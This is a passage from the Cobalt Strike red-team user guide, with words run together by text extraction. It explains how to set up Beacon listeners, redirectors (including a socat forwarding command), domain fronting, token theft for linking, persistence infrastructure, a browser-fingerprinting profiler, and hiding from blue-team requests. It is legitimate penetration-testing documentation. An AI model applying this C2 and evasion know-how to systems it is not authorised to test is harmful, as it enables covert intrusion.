provided.Eachhostisusedforoneconnection.
|
||
random:Selecttorandomlyselectahostnamefromthelisteachtimea
|
||
connectionisattempted.
|
||
failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe
|
||
listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod
|
||
(m,h,d),thenusethenexthost.
|
||
rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor
|
||
thespecifiedduration(m,h,d),thenusethenexthost.
|
||
Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof
|
||
consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral
|
||
defaultoptionstochoosefromoryoucancreateyourownlistwiththe
|
||
LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_
|
||
STRATEGIES on page 227.
|
||
none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts.
|
||
exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_
|
||
attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof
|
||
consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis
|
||
thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime.
|
||
Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew
|
||
sleeptime.
|
||
CobaltStrikeUserGuide www.fortra.com page:47
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe
|
||
newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent
|
||
jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe
|
||
resettozeroandthesleeptimewillberesettothepriorvalue.
|
||
DNS Host (Stager) -ThisconfigurestheDNSBeacon’sTXTrecordstager.Thisstager
|
||
isonlyusedwithCobaltStrikefeaturesthatrequireanexplicitstager.YourCobalt
|
||
Striketeamserversystemmustbeauthoritativeforthisdomainaswell.
|
||
Profile -AllowsabeacontobeconfiguredwithaselectedMalleableC2profilevariant.
|
||
DNS Port (Bind)-ThisfieldspecifiestheportyourDNSBeaconpayloadserverwill
|
||
bindto.Thisoptionisusefulifyouwanttosetupportbendingredirectorsuchas
|
||
aredirectorthatacceptsconnectionsonport53butroutestheconnectionto
|
||
yourteamserveronanotherport.
|
||
DNS Resolver -AllowsaDNSBeacontoegressusingaspecificDNSresolver,rather
|
||
thanusingthedefaultDNSresolverforthetargetserver.SpecifytheIPAddress
|
||
ofthedesiredresolver.ThisDNSResolverisnotusedbythestageroftheDNS
|
||
Beacon.
|
||
Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
|
||
thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
|
||
guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
|
||
Pressthe...buttontoopentheGuardrailsSettings:
|
||
figure25-GuardrailSettings
|
||
CobaltStrikeUserGuide www.fortra.com page:48
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
|
||
segments.Forexample:
|
||
l 123.123.123.123
|
||
l 123.123.123.*
|
||
l 123.123.*.*
|
||
l 123.*.*.*
|
||
User Name:Enteraspecificname,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive.
|
||
Server Name:Enteraspecificcomputername,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
Domain:Enteraspecificdomain,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
Testing
|
||
TotestyourDNSconfiguration,openaterminalandtypenslookup jibberish.beacon domain.
|
||
IfyougetanArecordreplyof0.0.0.0—thenyourDNSiscorrectlysetup.Ifyoudonotgetareply,
|
||
thenyourDNSconfigurationisnotcorrectandtheDNSBeaconwillnotcommunicatewithyou.
|
||
Notes
|
||
l MakesureyourDNSrecordsreferencetheprimaryaddressonyournetworkinterface.
|
||
CobaltStrike’sDNSserverwillalwayssendresponsesfrom yournetworkinterface’s
|
||
primaryaddress.DNSresolverstendtodropreplieswhentheyrequestinformationfrom
|
||
oneserver,butreceiveareplyfrom another.
|
||
CobaltStrikeUserGuide www.fortra.com page:49
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
l IfyouarebehindaNATdevice,makesurethatyouuseyourpublicIPaddressfortheNS
|
||
recordandsetyourfirewalltoforwardUDPtrafficonport53toyoursystem.Cobalt
|
||
StrikeincludesaDNSservertocontrolBeacon.
|
||
l TocustomizethenetworktrafficindicatorsforyourDNSbeacons,seeDNS Beacons on
|
||
page 148intheMalleableC2help.
|
||
HTTP Beacon and HTTPS Beacon
|
||
TheHTTPandHTTPSbeaconsdownloadtaskswithanHTTPGETrequest.Thesebeacons
|
||
senddatabackwithanHTTPPOSTrequest.Thisisthedefault.Youhaveincrediblecontrolover
|
||
thebehaviorandindicatorsinthispayloadviaMalleableC2.
|
||
HTTP(S)Listener Setup
|
||
TocreateaHTTPorHTTPSBeaconlistenerselectCobalt Strike -> Listenersonthemain
|
||
menuandpresstheAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:50
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
figure26-HTTPBeaconOptions
|
||
SelectBeacon HTTPorBeacon HTTPSasthePayloadtypeandgivethelisteneraName.
|
||
Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis
|
||
listenerthroughCobaltStrike’scommandsandworkflows.
|
||
Parameters
|
||
CobaltStrikeUserGuide www.fortra.com page:51
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
HTTP(S) Hosts-Press[+] toaddoneormorehostsfortheHTTPBeacontocallhome
|
||
to.Press[-]toremoveoneormorehosts.Press[X]toclearthecurrenthosts.If
|
||
youhavemultiplehosts,youcanstillpasteacomma-separatedlistofcallback
|
||
hostsintothisdialog.
|
||
Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters.
|
||
ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween
|
||
eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend
|
||
ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog
|
||
fordroppedhosts.
|
||
Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing
|
||
whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing:
|
||
round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare
|
||
provided.Eachhostisusedforoneconnection.
|
||
random:Selecttorandomlyselectahostnamefromthelisteachtimea
|
||
connectionisattempted.
|
||
failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe
|
||
listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod
|
||
(m,h,d),thenusethenexthost.
|
||
rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor
|
||
thespecifiedduration(m,h,d),thenusethenexthost.
|
||
Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof
|
||
consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral
|
||
defaultoptionstochoosefromoryoucancreateyourownlistwiththe
|
||
LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_
|
||
STRATEGIES on page 227.
|
||
none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts.
|
||
exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_
|
||
attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof
|
||
consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis
|
||
thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime.
|
||
Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew
|
||
sleeptime.
|
||
CobaltStrikeUserGuide www.fortra.com page:52
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe
|
||
newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent
|
||
jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe
|
||
resettozeroandthesleeptimewillberesettothepriorvalue.
|
||
HTTP Host (Stager)-ThiscontrolsthehostoftheHTTPStagerfortheHTTPBeacon.
|
||
Thisvalueisonlyusedifyoupairthispayloadwithanattackthatrequiresan
|
||
explicitstager.
|
||
Profile-ThisiswhereyouselectaMalleableC2profilevariant.Avariantisawayof
|
||
specifyingmultipleprofilevariationsinonefile.Withvariants,eachHTTPor
|
||
HTTPSlisteneryousetupcanhavedifferentnetworkindicators.
|
||
HTTP Port (C2)-ThisfieldsetstheportyourHTTPBeaconwillphonehometo.
|
||
HTTP Port (Bind)-ThisfieldspecifiestheportyourHTTPBeaconpayloadwebserver
|
||
willbindto.Theseoptionsareusefulifyouwanttosetupportbendingredirectors
|
||
(e.g.,aredirectorthatacceptsconnectionsonport80or443butroutesthe
|
||
connectiontoyourteamserveronanotherport).
|
||
HTTP Host Header-Thisvalue,ifspecified,ispropagatedtoyourHTTPstagersand
|
||
throughyourHTTPcommunication.Thisoptionmakesiteasiertotake
|
||
advantageofdomainfrontingwithCobaltStrike.
|
||
HTTP Proxy-Pressthe… buttontospecifyanexplicitproxyconfigurationforthis
|
||
payload.
|
||
Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
|
||
thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
|
||
guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
|
||
Pressthe...buttontoopentheGuardrailsSettings:
|
||
CobaltStrikeUserGuide www.fortra.com page:53
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
figure27-GuardrailSettings
|
||
IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
|
||
segments.Forexample:
|
||
l 123.123.123.123
|
||
l 123.123.123.*
|
||
l 123.123.*.*
|
||
l 123.*.*.*
|
||
User Name:Enteraspecificname,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive.
|
||
Server Name:Enteraspecificcomputername,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
Domain:Enteraspecificdomain,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
CobaltStrikeUserGuide www.fortra.com page:54
|
||
|
||
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon
|
||
Manual HTTP Proxy Configuration
|
||
The(Manual) Proxy Settingsdialogoffersseveraloptionstocontroltheproxyconfiguration
|
||
forBeacon’sHTTPandHTTPSrequests.ThedefaultbehaviorofBeaconistousetheInternet
|
||
Explorerproxyconfigurationforthecurrentprocess/usercontext.
|
||
figure28-ManualProxySettings
|
||
TheTypefieldconfiguresthetypeofproxy.TheHostandPortfieldstellBeaconwherethe
|
||
proxylives.TheUsernameandPasswordfieldsareoptional.Thesefieldsspecifythe
|
||
credentialsBeaconusestoauthenticatetotheproxy.
|
||
ChecktheIgnore proxy settings; use direct connectionboxtoforceBeacontoattemptits
|
||
HTTPandHTTPSrequestswithoutgoingthroughaproxy.
|
||
PressSet toupdatetheBeacondialogwiththedesiredproxysettings.PressReset tosetthe
|
||
proxyconfigurationbacktothedefaultbehavior.
|
||
NOTE:
|
||
ThemanualproxyconfigurationaffectstheHTTPandHTTPSBeaconpayloadstagesonly.
|
||
Itdoesnotpropagatetothepayloadstagers.
|
||
Redirectors
|
||
Aredirectorisasystemthatsitsbetweenyourtarget’snetworkandyourteamserver.Any
|
||
connectionsthatcometotheredirectorareforwardedtoyourteamservertoprocess.A
|
||
redirectorisawaytoprovidemultiplehostsforyourBeaconpayloadstocallhometo.A
|
||
CobaltStrikeUserGuide www.fortra.com page:55
|
||
|
||
ListenerandInfrastructureManagement/SMBBeacon
|
||
redirectoralsoaidsoperationalsecurityasitmakesithardertotracethetruelocationofyour
|
||
teamserver.
|
||
CobaltStrike’slistenermanagementfeaturessupporttheuseofredirectors.Simplyspecify
|
||
yourredirectorhostswhenyousetupanHTTPorHTTPSBeaconlistener.CobaltStrikedoes
|
||
notvalidatethisinformation.Ifthehostyouprovideisnotaffiliatedwiththecurrenthost,Cobalt
|
||
Strikeassumesit’saredirector.Onesimplewaytoturnaserverintoaredirectoristousesocat.
|
||
Here’sthesocatsyntaxtoforwardallconnectionsonport80totheteamserverat
|
||
192.168.12.100onport80:
|
||
socat TCP4-LISTEN:80,fork TCP4:192.168.12.100:80
|
||
SMB Beacon
|
||
TheSMBBeaconusesnamedpipestocommunicatethroughaparentBeacon.Thispeer-to-
|
||
peercommunicationworkswithBeaconsonthesamehost.Italsoworksacrossthenetwork.
|
||
WindowsencapsulatesnamedpipecommunicationwithintheSMBprotocol.Hence,thename,
|
||
SMBBeacon.
|
||
SMB Listener Setup
|
||
TocreateaSMBBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
|
||
theAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheSMBBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The
|
||
exceptiontothisaretheuser-drivenattacksthatrequireexplicitstagers.
|
||
CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt
|
||
toassumecontrolof(link)totheSMBBeaconpayloadforyou.IfyouruntheSMBBeacon
|
||
manually,youwillneedtolinktoitfromaparentBeacon.
|
||
TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:56
|
||
|
||
ListenerandInfrastructureManagement/SMBBeacon
|
||
figure29-SMBBeacon
|
||
SelectBeacon SMBasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
|
||
newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
|
||
CobaltStrike’scommandsandworkflows.
|
||
Parameters
|
||
Pipename (C2)-Setanexplicitpipenameoracceptthedefaultoption.
|
||
Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
|
||
thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
|
||
guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
|
||
Pressthe...buttontoopentheGuardrailsSettings:
|
||
CobaltStrikeUserGuide www.fortra.com page:57
|
||
|
||
ListenerandInfrastructureManagement/SMBBeacon
|
||
figure30-GuardrailSettings
|
||
IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
|
||
segments.Forexample:
|
||
l 123.123.123.123
|
||
l 123.123.123.*
|
||
l 123.123.*.*
|
||
l 123.*.*.*
|
||
User Name:Enteraspecificname,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive.
|
||
Server Name:Enteraspecificcomputername,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
Domain:Enteraspecificdomain,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
CobaltStrikeUserGuide www.fortra.com page:58
|
||
|
||
ListenerandInfrastructureManagement/TCPBeacon
|
||
Linking and Unlinking
|
||
FromtheBeaconconsole,uselink [host] [pipe] tolinkthecurrentBeacontoanSMBBeacon
|
||
thatiswaitingforaconnection.WhenthecurrentBeaconchecksin,itslinkedpeerswillcheckin
|
||
too.
|
||
Toblendinwithnormaltraffic,linkedBeaconsuseWindowsnamedpipestocommunicate.
|
||
ThistrafficisencapsulatedintheSMBprotocol.Thereareafewcaveatstothisapproach:
|
||
1. HostswithanSMBBeaconmustacceptconnectionsonport445.
|
||
2. YoumayonlylinkBeaconsmanagedbythesameCobaltStrikeinstance.
|
||
Ifyougetanerror5(accessdenied)afteryoutrytolinktoaBeacon:stealadomainuser’stoken
|
||
orusemake_token DOMAIN\user password topopulateyourcurrenttokenwithvalid
|
||
credentialsforthetarget.TrytolinktotheBeaconagain.
|
||
TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchild.The
|
||
[sessionPID]argumentistheprocessIDoftheBeacontounlink.Thisvalueishowyouspecifya
|
||
specificBeacontode-linkwhentherearemultiplechildrenBeacons.
|
||
Whenyoude-linkanSMBBeacon,itdoesnotexitandgoaway.Instead,itgoesintoastate
|
||
whereitwaitsforaconnectionfromanotherBeacon.Youmayusethelinkcommandto
|
||
resumecontroloftheSMBBeaconfromanotherBeaconinthefuture.
|
||
TCP Beacon
|
||
TheTCPBeaconusesaTCPsockettocommunicatethroughaparentBeacon.Thispeer-to-
|
||
peercommunicationworkswithBeaconsonthesamehostandacrossthenetwork.
|
||
TCP Listener Setup
|
||
TocreateaTCPBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
|
||
theAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:59
|
||
|
||
ListenerandInfrastructureManagement/TCPBeacon
|
||
figure31-TCPBeacon
|
||
SelectBeacon TCPasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
|
||
newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
|
||
CobaltStrike’scommandsandworkflows.
|
||
TheTCPBeaconconfiguredinthiswayisabindpayload.Abindpayloadisonethatwaitsfora
|
||
connectionfromitscontroller(inthiscase,anotherBeaconsession).
|
||
Parameters
|
||
Port (C2)-ThisoptioncontrolstheporttheTCPBeaconwillwaitforconnectionson.
|
||
Bind to localhost only-ChecktohavetheTCPBeaconbindto127.0.0.1whenit
|
||
listensforaconnection.ThisisagoodoptionifyouusetheTCPBeaconfor
|
||
localhost-onlyactions.
|
||
Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets
|
||
thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault
|
||
guardrailfortheStagelessorWindowsStagelessPayloadGenerators.
|
||
Pressthe...buttontoopentheGuardrailsSettings:
|
||
CobaltStrikeUserGuide www.fortra.com page:60
|
||
|
||
ListenerandInfrastructureManagement/TCPBeacon
|
||
figure32-GuardrailSettings
|
||
IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost
|
||
segments.Forexample:
|
||
l 123.123.123.123
|
||
l 123.123.123.*
|
||
l 123.123.*.*
|
||
l 123.*.*.*
|
||
User Name:Enteraspecificname,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive.
|
||
Server Name:Enteraspecificcomputername,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
Domain:Enteraspecificdomain,oravaluethat:
|
||
l “startswith”supportedby“*”wildcardcharacterontherightside
|
||
l “endswith”supportedby“*”wildcardcharacterontheleftside
|
||
Theguardiscase-insensitive
|
||
CobaltStrikeUserGuide www.fortra.com page:61
|
||
|
||
ListenerandInfrastructureManagement/ExternalC2
|
||
TheTCPBeaconiscompatiblewithmostactionsinCobaltStrikethatspawnapayload.The
|
||
exceptiontothisare,similartotheSMBBeacon,theuser-drivenattacksthatrequireexplicit
|
||
stagers.
|
||
CobaltStrikepost-exploitationandlateralmovementactionsthatspawnapayloadwillattempt
|
||
toassumecontrolof(connect)totheTCPBeaconpayloadforyou.IfyouruntheTCPBeacon
|
||
manually,youwillneedtoconnecttoitfromaparentBeacon.
|
||
Connecting and Unlinking
|
||
FromtheBeaconconsole,useconnect [ip address] [port] toconnectthecurrentsessiontoa
|
||
TCPBeaconthatiswaitingforaconnection.Whenthecurrentsessionchecksin,itslinked
|
||
peerswillcheckintoo.
|
||
TodestroyaBeaconlinkuseunlink [ip address] [session PID] intheparentorchildsession
|
||
console.Later,youmayreconnecttotheTCPBeaconfromthesamehost(oradifferenthost).
|
||
External C2
|
||
ExternalC2isaspecificationtoallowthird-partyprogramstoactasacommunicationlayerfor
|
||
CobaltStrike’sBeaconpayload.Thesethird-partyprogramsconnecttoCobaltStriketoread
|
||
framesdestinedfor,andwriteframeswithoutputfrompayloadscontrolledinthisway.The
|
||
ExternalC2serveriswhatthesethird-partyprogramsusetointerfacewithyourCobaltStrike
|
||
teamserver.
|
||
External C2 Listener Setup
|
||
TocreateanExternalC2BeaconlistenerselectCobalt Strike -> Listenersonthemainmenu
|
||
andpresstheAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheNewListenerpaneldisplays.
|
||
GotoCobalt Strike ->Listeners,pressAdd,andchooseExternalC2asyourpayload.
|
||
CobaltStrikeUserGuide www.fortra.com page:62
|
||
|
||
ListenerandInfrastructureManagement/ExternalC2
|
||
figure33-ExternalC2
|
||
SelectExternal C2asthePayloadtypeandgivethelisteneraName.Makesuretogivethenew
|
||
listeneramemorablenameasthisnameishowyouwillrefertothislistenerthroughCobalt
|
||
Strike’scommandsandworkflows.
|
||
Parameters
|
||
Port (Bind)-SpecifytheporttheExternalC2serverwaitsforconnectionson.
|
||
Bind to localhost only-ChecktomaketheExternalC2serverlocalhost-only.
|
||
NOTE:
|
||
ExternalC2listenersarenotlikeotherCobaltStrikelisteners.Youcannottargetthesewith
|
||
CobaltStrike’spost-exploitationactions.Thisoptionisjustaconvienencetostandupthe
|
||
interfaceitself.
|
||
Specification
|
||
TheExternalC2interfaceisdescribedintheExternalC2specification.
|
||
CobaltStrikeUserGuide www.fortra.com page:63
|
||
|
||
ListenerandInfrastructureManagement/ForeignListeners
|
||
l ExternalC2Specification
|
||
l extc2example.c
|
||
Ifyou'dliketoadapttheexample(AppendixB)inthespecificationintoathird-partyC2,youmay
|
||
assumea3-clauseBSDlicenseforthecodecontainedwithinthespecification.
|
||
Third-party Materials
|
||
Here'salistofthird-partyprojectsandpoststhatreference,use,orbuildonExternalC2:
|
||
l Custom CommandandControl(C3)byF-SecureLabs.Aframeworkforrapid
|
||
prototypingofcustom C2channels.
|
||
l external_c2_frameworkbyJonathanEchavarria.APythonFrameworkforbuilding
|
||
ExternalC2clientsandservers.
|
||
l ExternalC2LibrarybyRyanHanson.NETlibrarywithWebAPI,WebSockets,andadirect
|
||
socket.Includesunittestsandcomments.
|
||
l TaskingOffice365forCobaltStrikeC2byMWR Labs.DiscussionanddemoofOffice
|
||
365C2forCobaltStrike.
|
||
l SharedFileC2byOutflankBV.POCtouseafile/shareforcommandandcontrol.
|
||
Foreign Listeners
|
||
CobaltStrikesupportstheconceptofforeignlisteners.Thesearealiasesforx86 payload
|
||
handlers hostedintheMetasploitFrameworkorotherinstancesofCobaltStrike.Topassa
|
||
WindowsHTTPSMeterpretersessiontoafriendwithmsfconsole,setupaForeignHTTPS
|
||
payloadandpointtheHostandPortvaluestotheirhandler.Youmayuseforeignlisteners
|
||
anywhereyouwoulduseanx86CobaltStrikelistener.
|
||
Foreign Listeners Setup
|
||
TocreateaForeignBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuand
|
||
presstheAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:64
|
||
|
||
ListenerandInfrastructureManagement/InfrastructureConsolidation
|
||
figure34-ForeignHTTP
|
||
SelectForeign HTTPorForeign HTTPSasthePayloadtypeandgivethelisteneraName.
|
||
Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis
|
||
listenerthroughCobaltStrike’scommandsandworkflows.
|
||
Parameters
|
||
HTTP(S) Host (Stager)-Thisfieldspecifiesthenameoftheserverwhereyourforeign
|
||
listenerislocated.
|
||
HTTP(S) Port (Stager)-Thisfieldspecifiestheportontheserverwhereyourforeign
|
||
listenerislisteningforconnections.
|
||
Infrastructure Consolidation
|
||
CobaltStrike’smodelfordistributedoperationsistostandupaseparateteamserverforeach
|
||
phaseofyourengagement.Forexample,itmakessensetoseparateyourpost-exploitationand
|
||
persistenceinfrastructure.Ifapost-exploitationactionisdiscovered,youdon’twantthe
|
||
remediationofthatinfrastructuretoclearoutthecallbacksthatwillletyoubackintothe
|
||
network.
|
||
CobaltStrikeUserGuide www.fortra.com page:65
|
||
|
||
ListenerandInfrastructureManagement/InfrastructureConsolidation
|
||
Someengagementphasesrequiremultipleredirectorandcommunicationchanneloptions.
|
||
CobaltStrike4.0isfriendlytothis.
|
||
figure35-InfrastructureConsolidationFeatures
|
||
YoucanbindmultipleHTTP,HTTPS,andDNSlistenerstoasingleCobaltStriketeamserver.
|
||
Thesepayloadsalsosupportportbendingintheirconfiguration.Thisallowsyoutousethe
|
||
commonportforyourchannel(80,443,or53)inyourredirectorandC2setups,butbindthese
|
||
listenerstodifferentportstoavoidportconflictsonyourteamserversystem.
|
||
Togivevarietytoyournetworkindicators,CobaltStrike’sMalleableC2profilesmaycontain
|
||
multiplevariants.Avariantisawayofaddingvariationsofthecurrentprofileintooneprofilefile.
|
||
YoumayspecifyaProfilevariantwhenyoudefineeachHTTPorHTTPSBeaconlistener.
|
||
Further,youcandefinemultipleTCPandSMBBeaconsononeteamserver,eachwithdifferent
|
||
pipeandportconfigurations.AnyegressBeacon,fromthesameteamserver,cancontrolanyof
|
||
theseTCPorSMBBeaconpayloadsoncethey’redeployedinthetargetenvironment.
|
||
CobaltStrikeUserGuide www.fortra.com page:66
|
||
|
||
InitialAccess/Client-sideSystemProfiler
|
||
Initial Access
|
||
CobaltStrikehasseveraloptionsthataidinestablishinganinitialfootholdonatarget.This
|
||
rangesfromprofilingpotentialtargetstopayloadcreationtopayloaddelivery.
|
||
Client-side System Profiler
|
||
Thesystemprofilerisareconnaissancetoolforclient-sideattacks.Thistoolstartsalocalweb-
|
||
serverandfingerprintsanyonewhovisitsit.Thesystemprofilerprovidesalistofapplications
|
||
andpluginsitdiscoversthroughtheuser’sbrowser.Thesystemprofileralsoattemptsto
|
||
discovertheinternalIPaddressofuserswhoarebehindaproxyserver.
|
||
Tostartthesystemprofiler,gotoAttacks -> System Profiler.Tostarttheprofileryoumust
|
||
specifyaURItobindtoandaporttostarttheCobaltStrikeweb-serverfrom.
|
||
IfyouspecifyaRedirectURL,CobaltStrikewillredirectvisitorstothisURLoncetheirprofileis
|
||
taken.ClickLaunch tostartthesystemprofiler.
|
||
TheSystemProfilerusesanunsignedJavaApplettodecloakthetarget’sinternalIPaddress
|
||
anddeterminewhichversionofJavathetargethas.WithJava’sclick-to-runsecurityfeature—
|
||
thiscouldraisesuspicion.UnchecktheUse Java Applettogetinformationboxtoremovethe
|
||
JavaAppletfromtheSystemProfiler.
|
||
ChecktheEnable SSLboxtoservetheSystemProfileroverSSL.Thisboxisdisabledunless
|
||
youspecifyavalidSSLcertificatewithMalleableC2.Chapter11discussesthis.
|
||
Application Browser
|
||
Toviewtheresultsfromthesystemprofiler,gotoView->Applications.Thisopensan
|
||
ApplicationstabwithatableshowingallapplicationinformationcapturedbytheSystem
|
||
Profiler.
|
||
Analyst Tips
|
||
TheApplicationBrowserhasalotofinformationusefultoplanatargetedattack.Here'showto
|
||
getthemostoutofthisoutput:
|
||
TheinternalIPaddressfieldisgatheredfromabenignunsignedJavaapplet.Ifthisfieldsays
|
||
unknown,thismeanstheJavaappletprobablydidnotrun.IfyouseeanIPaddresshere,this
|
||
meanstheunsignedJavaappletran.
|
||
CobaltStrikeUserGuide www.fortra.com page:67
|
||
|
||
InitialAccess/CobaltStrikeWebServices
|
||
InternetExplorerwillreportthebaseversiontheuserinstalled.AsInternetExplorergets
|
||
updates--thereportedversioninformationdoesnotchange.CobaltStrikeusestheJScript.dll
|
||
versiontoestimateInternetExplorer'spatchlevel.Gotosupport.microsoft.comandsearchfor
|
||
JScript.dll'sbuildnumber(thethirdnumberintheversionstring)tomapittoanInternet
|
||
Explorerupdate.
|
||
A*64nexttoanapplicationmeansit'sanx64application.
|
||
Cobalt Strike Web Services
|
||
ManyCobaltStrikefeaturesrunfromtheirownwebserver.Theseservicesincludethesystem
|
||
profiler,HTTPBeacon,andCobaltStrike’swebdrive-byattacks.It’sOKtohostmultipleCobalt
|
||
Strikefeaturesononewebserver.
|
||
TomanageCobaltStrike’swebservices,gotoView ->Web Drive-by ->Manage.Here,youmay
|
||
copyanyCobaltStrikeURLtotheclipboardorstopaCobaltStrikewebservice.
|
||
UseView ->Web Log tomonitorvisitstoyourCobaltStrikewebservices.
|
||
IfCobaltStrike’swebserverseesarequestfromtheLynx,Wget,orCurlbrowser;CobaltStrike
|
||
willautomaticallyreturna404page.CobaltStrikedoesthisaslightprotectionagainstblue
|
||
teamsnooping.ThecanbeconfiguredwiththeMalleableC2‘.http-config.block_useragents’
|
||
option.
|
||
User-driven Attack Packages
|
||
Thebestattacksarenotexploits.Rather,thebestattackstakeadvantageofnormalfeaturesto
|
||
getcodeexecution.CobaltStrikemakesiteasytosetupseveraluser-drivenattacks.These
|
||
attackstakeadvantageoflistenersyou’vealreadysetup.NavigateinthemenutoPayloadsand
